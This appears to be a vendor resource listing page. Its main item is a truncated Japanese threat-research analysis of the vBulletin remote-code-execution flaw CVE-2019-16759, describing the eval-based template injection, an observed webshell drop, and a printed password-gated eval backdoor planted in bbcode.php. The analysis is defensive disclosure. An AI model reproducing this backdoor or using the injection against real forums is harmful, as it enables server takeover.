This ebrief explains why traditional security solutions often come up short when it comes to securing the telco cloud, what new solutions are arriving on the market, and areas where more innovation is needed.

This Geek Guide examines the business value of adopting DevSecOps and the container technologies and provides advice that will help you achieve DevSecOps.

概要 2019年9月24日(米国時間)にvBulletinの新しいゼロデイ脆弱性が公開されました。vBulletinはプロプライエタリなインターネットフォーラムソフトウェアで、当該脆弱性に割り当てられたCVE番号はCVE-2019-16759です。公開から数週間が経過し、Unit 42のリサーチャーは、同脆弱性が積極的に悪用されている状況を確認しています。実行中のvBulletinサーバーのバージョンが5.0.0から5.5.4である場合、同脆弱性の悪用により認証を受けていない攻撃者が特権アクセスや制御を取得し、vBulletinサーバーの正当な所有者が自サイトにアクセスできなくなる可能性があります。10万件以上のサイトが、主要な企業や組織のフォーラムを含めてvBulletin上に構築されていますので、該当組織はただちに修正プログラムを適用する必要があります。 本稿では、脆弱性の根本要因に関する新しい詳細、脆弱性を実証する概念実証コード（PoC）、弊社で実際に観測した攻撃関連情報を共有します。 脆弱性の根本要因分析 本脆弱性はCVSS v3.1ベースでスコア9.8(緊急)と評価された認証前のリモートコード実行における脆弱性で、vBulletinバージョン5.0.0で導入されたAjaxのレンダリング機能によるPHPサーバーサイド テンプレート インジェクションにその原因があります。 エントリ ポイントとなるコードはindex.phpにあります。 このコードは、vB5_Frontend_ApplicationLight::isQuickRoute()を呼び出して、リクエストが「クイックルート」であるかどうかを確認しています。メソッドisQuickRoute()はincludes/vb5/frontend/applicationlight.php内にあります。 図2に示したように、この関数では、リクエストの先頭に”ajax/api”か”ajax/render“があれば真を返します。その後vB5_Frontend_ApplicationLightオブジェクトが初期化され、実行されます(図1参照)。 図3は、リクエストが”ajax/render“で始まる場合、ハンドラが”callRender“に設定されることを示しています。 図4は、callRender()関数が、$routeInfo[2]とarray_merge($_POST, $GET) からの$paramsを利用してテンプレートをレンダリングする様子を示しています。 図5は、vbulletin-style.xmlファイル内に“widget_php”というテンプレートがあることを示しています。このテンプレートによれば、$widgetConfig[‘code’]が空でなく、かつ$vboptions[‘disable_php_rendering’]が設定されていなければ、次のコードが実行されることになっています。 {vb:action evaledPHP, bbcode, evalCode, {vb:raw widgetConfig.code}} {vb:raw $evaledPHP} 図6はevalCode()関数を示していますが、ここで$code内のテキストはPHPのeval()関数によって直接実行されています。   PoC 以上の分析にもとづいて、脆弱性が機能することを証明するエクスプロイトコードを組み立てることができます。パラメーター”routestring“は$_REQUESTからきているので、HTTPメソッド$_GET、$_POST、$_COOKIEのいずれかを介して送信することができます。また、”widgetConfig[code]“は$_GETと$_POSTを介して送信できます。そのため、ここでは単純なPoCとして次のコードを組み、GETリクエストかPOSTリクエストかで送信することにします。       図7は、GETリクエストを介してPoCコードが送信され、phpinfo()が実行された様子を示しています。 図8は、POSTリクエストを介してPoCコードが送信され、phpinfo()が実行された様子を示しています。 インターネット上で観測されたエクスプロイト 弊社の次世代ファイアウォール製品を使い、私たちは当該脆弱性を悪用する試みを複数検出しました。以下、そのなかから3件のエクスプロイトについてまとめます。 最初の例（図9）では、攻撃者がdie(@md5(HellovBulletin))を実行することで、対象サーバーが脆弱かどうかを判断しようとしています。ここでは、リクエストに余計な“=”記号が1つ含まれていたことが原因でエクスプロイトは失敗しています。 また図10は、攻撃者がwebのルートディレクトリに”webconfig.txt.php”を設置しようとした様子を示しています。 図11は”webconfig.txt.php”の内容をBase64デコードしたものを示しています。内容は1行のPHPwebshellです。攻撃者はこのwebshellを使い、スクリプトに任意のコマンドを送信してホストに実行させられるようにしています。 図12は、攻撃者がファイルbbcode.phpを上書きしようとする3番目の例を示しています。 これが成功すればevalCode()は次のコードに置き換えられます。 function evalCode($code) { ob_start();if (isset($_REQUEST["epass"]) && $_REQUEST["epass"] == "2dmfrb28nu3c6s9j") { eval($code);} $output =...

A new zero-day vulnerability was recently disclosed for vBulletin, a proprietary Internet forum software and the assigned CVE number is CVE-2019-16759. Now, several weeks later, Unit 42 researchers have identified active exploitation of this vulnerability in the wild. By exploiting this vulnerability, an unauthenticated attacker can gain privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organizations out from their own sites. More than 100,000 sites are built on vBulletin, including the forums of major enterprises and organizations, so it’s imperative to patch immediately.

In this eBook you will learn how to begin addressing container security holistically, how to start embedding security across the entire container life cycle (i.e. DevSecOps), and how to gain full stack security awareness that will allow you to reduce, prioritize and automatically filter out alerts based on holistic, cloud context.

This eBook will help you navigate the requirements for properly deploying Office 365, and provide guidance on how to choose a solution that delivers both the connectivity and security that you need.

John Kindervag, founder of Zero Trust, uses a simple deck of cards to provide a high level overview Zero Trust.

Learn how Prisma can help secure your branch offices through cloud-delivered security in this short video.

This infographic looks at how a Zero Trust approach can help mitigate the risks associated with cloud applications and reduce your attack surface.

This infographic details the advantages and disadvantages SaaS applications, industry trends and statistics, and provides best practices to securing cloud applications and data.

BeyondCorp is a cybersecurity architecture developed at Google which shifts access control from the traditional network perimeter to individual devices and users.

Zero Trust is an IT security model that eliminates the notion of trust to protect networks, applications and data. While this may seem straightforward to implement in an enterprise network, how do they apply to securing the cloud?

パロアルトネットワークスの脅威インテリジェンスチームUnit 42は、東南アジアにおいて、公開済みのマルウェアとカスタムマルウェアを組み合わせた一連のサイバースパイ攻撃キャンペーンを3年間追跡してきました。Unit 42は、これらの攻撃およびこのレポートで後述するその他の攻撃の背後に存在する脅威攻撃者グループ(または複数のグループ)に「PKPLUG」という名前を付けました。現時点では、同じツールを使用し、同じタスクを実行してこの攻撃を行っているのが1つのグループなのか、複数のグループなのかを自信を持って判断できないため、弊社は、グループまたは複数のグループと言及しています。PKPLUGという名前は、PlugXマルウェアをDLLサイドローディングパッケージの一部としてZIPアーカイブファイル内に配信している攻撃手法と、ZIPファイル形式のヘッダーにASCIIマジックバイト「PK」が含まれていることが由来です。

For technical details and to configure the integration between our two products, download this integration guide.

Often used in tandem, Malware and Exploits are sometimes confused for each other. They are, however, not synonymous and bear several clear distinctions.

Expedition's Tools Digital Learning Training

Palo Alto Networks (NYSE: PANW), the global cybersecurity leader, today announced Cortex XDR and Cortex Data Lake have achieved the designation of "In Process" for the Federal Risk and...

There is a five-step model for implementing and maintaining Zero Trust. Using this model, you are able to understand where you are currently in your implementation process and where to go next.

Like “machine learning” and “AI,” Zero Trust has become one of cybersecurity’s latest buzzwords. With all the noise out in the market, it’s imperative to understand what Zero Trust is, as well as what Zero Trust isn’t.

Researchers have revealed a previously undocumented threat actor of Chinese origin that has run at least six different cyber espionage campaigns in the Southeast Asian region since 2013.

A concise summary of how Palo Alto Networks helps K-12 schools achieve CIPA compliance

Join our live webinar to learn the latest techniques for more efficient threat hunting and accelerated investigations.

Recent technology trends have led to a marked increase in the amount of TLS traffic, as it provides confidentiality and trust. However, this also presents an opportunity for attackers to hide malicious activity and calls for an even more pressing need for SSL Decryption.

Read this for tips on protecting your school district from the top threats to online student safety, data privacy and compliance

To learn more about the key benefits of implementing this integration and sample use cases, download the solution brief.

For technical details and to configure the integration between our two products, download this integration guide.

Read about our Firewall Migration Services to help you safely migrate to your new Next-generation firewall and Panorama

Cloud security requires a strategic approach to be applied across your entire organization. By taking ownership of cloud security and partnering with the right cloud vendor, you can ensure that your organization is fully protected.

A previously unknown group or collective associated with China is targeting victims in Asia, possibly for geopolitical gain.

For three years, Unit 42 has tracked a set of cyber espionage attack campaigns across Asia, which used a mix of publicly available and custom malware. Unit 42 created the moniker “PKPLUG” for the threat actor group, or groups, behind these and other documented attacks referenced later in this report. We say group or groups as our current visibility doesn’t allow us to determine with high confidence if this is the work of one group, or more than one group which uses the same tools and has the same tasking. The name comes from the tactic of delivering PlugX malware inside ZIP archive files as part of a DLL side-loading package. The ZIP file format contains the ASCII magic-bytes “PK” in its header, hence PKPLUG.